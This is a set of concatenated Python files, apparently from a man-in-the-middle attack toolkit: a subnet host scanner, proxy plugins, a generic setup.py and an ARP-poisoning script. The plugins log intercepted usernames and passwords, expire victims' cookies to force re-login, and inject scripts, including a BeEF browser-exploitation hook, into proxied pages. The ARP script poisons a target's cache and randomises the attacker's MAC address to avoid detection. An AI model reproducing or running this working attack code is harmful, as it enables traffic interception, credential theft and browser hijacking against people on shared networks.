#!/usr/bin/env python

# shows users

from tools.logs import log, logging
from tools.bash import route, nmap, nbtscan, ifconfig
import socket
import os
import sys

def getUsers():
    """ prints list of ip, MAC, hardware, netbios """

    log.info("listing users")
    
    # get data
    router = route().router
    subnet =  router +  "/24"
    nmap1 = nmap("-sn -n %s" % subnet)
    nbtscan1 = nbtscan(subnet)
    ifconfig1 = ifconfig()
    
    # add current machine
    nmap1.ip.add(ifconfig1.wlanip)
    nmap1.mac[ifconfig1.wlanip] = ifconfig1.wlanmac
    nbtscan1.netbios[ifconfig1.wlanip] = "** this pc **"

    # flag router
    nbtscan1.netbios[router] = "** router **"

    # print formatted
    try:
        nmap1.ip = sorted(nmap1.ip, key=lambda item: socket.inet_aton(item))
    except:
        log.error("Problem sorting ip addresses")
    format1 = '{0:<15} {1:<17} {2:<15} {3:<15}'
    print(format1.format("ip", "mac", "hardware", "netbios"))
    print(format1.format("==", "===", "========", "======="))
    for ip in nmap1.ip:
        print(format1.format(ip, nmap1.mac.get(ip, ""), nmap1.hw.get(ip,""), nbtscan1.netbios.get(ip, "")))

log.setLevel(logging.INFO)
getUsers()



""" Contains multiple actions to handle callbacks from mim
    (More complex actions each have their own module and just need importing)

    Usage:
        from plugins import otherplugins
        otherplugins.init(args, BEEFPORT, FILESERVER, FILEPORT)

    The init function is needed to pass args and then test args["--option"]
"""

from tools.logs import log

# used by actions
import os
import StringIO
from urlparse import urlparse
import lxml
# note this package is called Pillow
from PIL import Image

# callbacks
from tools.pydispatch2 import on
from proxyserver import gotRequest
from proxyclient import gotResponseTree, gotResponseImage

def init(args, BEEFPORT, FILESERVER, FILEPORT):
    """ if option selected in args then connect callback function to signal """

########################### gotRequest ########################################################################

    if args["--kill"]:
        # domains that have had sessions killed to force logoff
        killed = set()

        @on(gotRequest)
        def kill(sender):
            """ kill session by expiring all cookies on first call to a domain """
            if sender.method == "POST" or not sender.requestHeaders.hasHeader('cookie') or \
                    sender.domain in killed:
                return
            log.debug("{id} Killing session for {domain}".format(id=sender.id, domain=sender.domain))
            sender.setResponseCode(302, "Moved")
            sender.setHeader("Connection", "close")
            sender.setHeader("Location", sender.pathquery)

            killed.add(sender.domain)

            # get list of unique cookie names
            names = set()
            cookies = sender.getHeader("cookie")
            for cookie in cookies.split(";"):
                names.add(cookie.split("=")[0].strip())

            # multiple attempts to kill session
            # domains = .reddit.com, forum.reddit.com; paths = /, /rootpath
            domains = [sender.domain, '']
            paths = ["/"]
            try:
                paths.append(sender.path.split("/")[1])
            except:
                pass

            for name in names:
                # note must include domain and must set path or set-cookie is ignored.
                # note must set expires date otherwise will be treated as a session cookie.
                for domain in domains:
                    for path in paths:
                        sender.addCookie(name, "expired", domain=domain, path=path, expires="Mon, 01-Jan-1990 00:00:00 GMT")

            log.debug("{id} Response to kill sessions:\n{response}" \
                                    .format(id=sender.id, response=sender.getResponse()))
            sender.finish()

    if args["--auth"]:
        @on(gotRequest)
        def auth(sender):
            """ log userids and passwords from get and post requests
                NOTE this will not work with most sites """

            include = ["log", "login", "logon", "user", "username", "key", "name", "email", \
                     "password", "pass", "passwd", "pwd", "psw", "passw", "auth"]

            query = sender.data if sender.data else sender.query
            if not query:
                return

            # split into auth and noauth
            q = urlparse.parse_qs(query)
            auth = dict()
            noauth = dict()
            for k, v in q.items():
                if k in include:
                    auth[k] = v
                else:
                    noauth[k] = v

            # output auth
            auth = '\n'.join(["%s=%s"%(k,v) for k, v in auth.items()])
            log.info("query strings===>\n%s"% auth)

            # output noauth truncating the values
            noauth = {k: v[:15]+"..." if len(v)>15 else v for k, v in noauth.items()}
            noauth = '\n'.join(["%s=%s"%(k,v) for k, v in noauth.items()])
            log.info("auth strings===> ***************************************\n%s" % noauth)

########################### gotResponseTree ########################################################################
    
    if args["--inject"]:
        @on(gotResponseTree)
        def inject(sender, tree):
            """ include jquery to remove https e.g. ebay changes loaded back to https after loading """
            injection = '<script src=http://%s:%s/injection.html></script>'%(FILESERVER, FILEPORT)
            head = tree.xpath("//head")[0]
            elem = lxml.etree.fromstring(injection)
            head.insert(0, elem)
    
    if args["--beef"]:
        @on(gotResponseTree)
        def beef(sender, tree):
            """ inject a beef hook for the browser exploitation framework """
            injection = '<script src=http://%s:%s/hook.js></script>'%(FILESERVER, BEEFPORT)
            head = tree.xpath("//head")[0]
            elem = lxml.etree.fromstring(injection)
            head.insert(0, elem)

    if args["--cats"]:
        @on(gotResponseTree)
        def cats(sender, tree):
            """ replace image links with link to image on server
            NOTE: does not replace other links e.g. <a> """
            for item in tree.xpath("//img"):
                item.attrib["src"] = "http://%s:%s/cats.jpg"%(FILESERVER, FILEPORT)

#################### gotResponseImage ###############################################################################

    if args["--upsidedown"]:
        @on(gotResponseImage)
        def upsidedown(sender):
            """ turn image upsidedown """
            try:
                s = StringIO.StringIO(sender.data)
                img = Image.open(s).rotate(180)
                s2 = StringIO.StringIO()
                img.save(s2, sender.imagetype)
                sender.data = s2.getvalue()
            except:
                log.exception("cannot rotate image with type=%s" % sender.imagetype)


#!/usr/bin/env python

"""
This file provides a standard setup.py for use with any python/git source distribution.
The defaults can be overridden using setup.cfg

Defaults:
    name             = root folder name
    description      = root folder name
    install_requires = requirements.txt
    dependency_links = requirements.txt lines starting http
    long_description = first README.*
    license          = first line of LICENSE.txt
    version          = root/version.py with a line such as __version__ = "9.9.9"
    included files   = everything managed by git (see git ls-files)
    excluded files   = .gitignore
    scripts          = files in bin folder

Example of setup.cfg to override defaults:
    [metadata]
        name=myproject # overrides default setting
        author=simon   # adds new setting
    [setup]
        autoinc = 0,1,2 # increments major/minor/micro version when you call setup.py sdist

To submit to pypi for first time
    setup.py register sdist upload

To submit to pypi 2nd time
    setup.py sdist upload

To upload to github after setup run (setup.py stages changes but does not commit)
    git commit -am <message> push

To install:
    pip install <name>
"""
import ConfigParser
from mim.tools.logs import log
from setuptools import setup, find_packages
import pkg_resources
from subprocess import check_output
import os
import sys

here = os.path.abspath(os.path.dirname(__file__))
os.chdir(here)

try:
    from version import __version__
except:
    __version__ = "0.0.0"
    with open("version.py", "w") as f:
        f.write("__version__='%s'"%__version__)

def main():
    log.info("***** running setup.py with args=%s *****"%sys.argv)
    
    # get setup.cfg
    c = ConfigParser.ConfigParser(allow_no_value=True)
    try:
        c.readfp(open("setup.cfg"))
    except:
        log.warning("setup.cfg not found")
        c = None

    if "sdist" in sys.argv:
        updateversion(c)
        # update git with new and deleted files to ensure correct files included
        try:
            check_output(["git", "add", "-A"])
        except:
            log.exception("Error updating git files")
            sys.exit()
        
    setupdict = defaultSetup()
   
    setupdict.update(cfgSetup(c))
    
    logsetup(setupdict)    
    setup(**setupdict)

def updateversion(c):
    global __version__
    # autoincrement
    try:
        inc = int(c.get("setup", "autoinc"))
        v = pkg_resources.parse_version(__version__)
        vints = map(int, v[:3])
        vints[inc] += 1
        __version__ = ".".join(map(str,vints))
        with open("version.py", "w") as f:
            f.write("__version__='%s'"%__version__)
    except:
        pass
    
    # setup.cfg
    try:
        __version__ = c.get("metadata", "version")
        with open("version.py", "w") as f:
            f.write("__version__='%s'"%__version__)
    except:
        pass

def defaultSetup():
    """ returns default dict """
    name = here.split("/")[-1]
    setupdict=dict(
    	# basic settings to create sdist tar with files under version control
        name = name,
        description = name,
        setup_requires = ["setuptools_git >= 0.3"],
        version      = __version__,
        license = license(),
        long_description = long_description(),
        install_requires = install_requires(),
        dependency_links = dependency_links(),
        
        # additional settings for pip install
        packages     = find_packages(),
        include_package_data = True,
        scripts = scripts(),
        data_files = [('', data_files())]
    )
    return setupdict

def cfgSetup(c):
    """ process setup.cfg and return dict """

    # get metadata section
    try:
        cfg = dict(c.items("metadata"))
        cfg.update({k:v.splitlines() for k,v in cfg.items() if v.find("\n") >=0})
    except:
        cfg = dict()
    
    return cfg

def logsetup(setupdict):
    """ log the setupdict """
    output=""
    for k,v in setupdict.items():
        if k == "long_description":
            v=v.splitlines()[0]
        output+="{k}={v}\n".format(**locals())
    log.info(output)

def license():
    try:
        with open("LICENSE.txt","r") as f:
            return f.readline().strip()
    except:
        return ""

def scripts():
    """ get files from scripts folder and remove any not managed by git """
    files = ["bin/"+f for f in os.listdir('bin') if os.path.isfile("bin/"+f)]
    if "sdist" in sys.argv:
        gitfiles = check_output(["git", "ls-files"]).splitlines()
        # must remove else any scripts specified are included even if not managed by git
        files = [script for script in files if script in gitfiles]
    return files

def data_files():
    """ get files from root folder and remove any not managed by git """
    files = [f for f in os.listdir(here) if os.path.isfile(f)]
    if "sdist" in sys.argv:
        gitfiles = check_output(["git", "ls-files"]).splitlines()
        # must remove else any scripts specified are included even if not managed by git
        files = [f for f in files if f in gitfiles]
    return files

def install_requires():
    """ use requirements.txt """
    try:
        with open("requirements.txt", "r") as f:
            reqs = [req.split("#")[0].strip() for req in f.read().splitlines()]
            install_requires = [req for req in reqs if not req.startswith("http")]
            return install_requires
    except IOError:
        return []
    except:
        log.exception("problem parsing install_requires")
        sys.exit()

def dependency_links():
    """ use requirements.txt """
    try:
        with open("requirements.txt", "r") as f:
            reqs = [req.split("#")[0].strip() for req in f.read().splitlines()]
            dependency_links = [req for req in reqs if req.startswith("http")]
            return dependency_links
    except IOError:
        return []
    except:
        log.exception("problem parsing dependency_links")
        sys.exit()

def long_description():
    """ set long description = first README.* """
    try:
        readme = [f for f in os.listdir(here) if f.startswith("README")][0]
        with open(readme, "r") as f:
    	    return f.read()
    except:
     	return ""

main()


#!/usr/bin/env python

"""
Arp poisons a target; and resets the arp poison on exit.
Uses default interface, router and ip

    usage: arp.py [options]

    optional arguments:
      -h, --help              Show this help message and exit
      -l, --loglevel=X        logging level [default: 10]

      -m, --changemac         Change to random mac address (can take 30 secs)
      -r, --reset             Reset arp poison (should happen on exit anyway)
      -t TARGET, --target     IP address of target [default: 192.168.0.4]
"""
import os
if not os.geteuid()==0:
	exit("\nPlease run as root\n")

from tools.logs import log, logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

import sys
from scapy.all import send, ARP, sr1
from tools.tools import su, setTitle, fwreset
from tools.bash import arp, route
import time
from docopt import docopt

FREQ = 5

def main():
    args = docopt(__doc__, version='arp 1.0')

    log.setLevel(int(args["--loglevel"]))

    # get router
    r = route()
    if not r.iface or not r.router:
        log.warning("Default route not found")
        sys.exit()
    router = r.router
    iface = r.iface

    # arp reset
    if args["--reset"]:
        unpoison(router, args["--target"])
        fwreset()
        sys.exit()

    # check target is reachable before sending ARP poison. Otherwise scapy sends broadcast ARP poison.
    # Note arp used as ping does not get response from windows machines.
    response = sr1(ARP(pdst=args["--target"]), timeout=2, verbose=0)
    if not response:
        log.info("%s target not found" % args["--target"])
        fwreset()
        sys.exit()

    # change MAC address for extra anonymity
    # only do this if happy to wait 20 seconds to bring network down and up
    if args["--changemac"]:
        su('ifconfig %s down' % iface)
        su('macchanger -r %s' % iface)
        log.info("waiting for network to come back up")
        su('ifconfig %s up' % iface)
        su('dhclient %s' % iface)

    poison(router, args["--target"])
    unpoison(router, args["--target"])
    fwreset()


def poison(src, target):
    """ repeatedly send fake message from router with our MAC address """
    try:
        seconds = 0
        log.info("Starting ARP poison every %s seconds. Router=%s Target=%s" % (FREQ, src, target))
        while 1:
            send(ARP(psrc=src, pdst=target))
            time.sleep(FREQ)
            seconds += FREQ
            log.info("%s seconds elapsed" % seconds)
    except KeyboardInterrupt:
        log.info("Poison interrupted by Ctrl-C")
    except:
        log.info("problem sending arp poison")


def unpoison(router, target):
    """ get correct MAC for router and send to the target to reset ARP cache """
    mac = arp().mac
    # if not already in arp cache then ping and try again
    if router not in mac:
        sr1(IP(dst=router)/ICMP())
        mac = arp().mac
    if router not in mac:
        log.warning("Router MAC address not found. Could not remove ARP poison.")
        sys.exit()
    log.info("Unpoison sent to %s for gateway %s at mac address %s" % (target, router, mac[router]))
    send(ARP(psrc=router, hwsrc=mac[router], pdst=target))

setTitle(__file__)
main()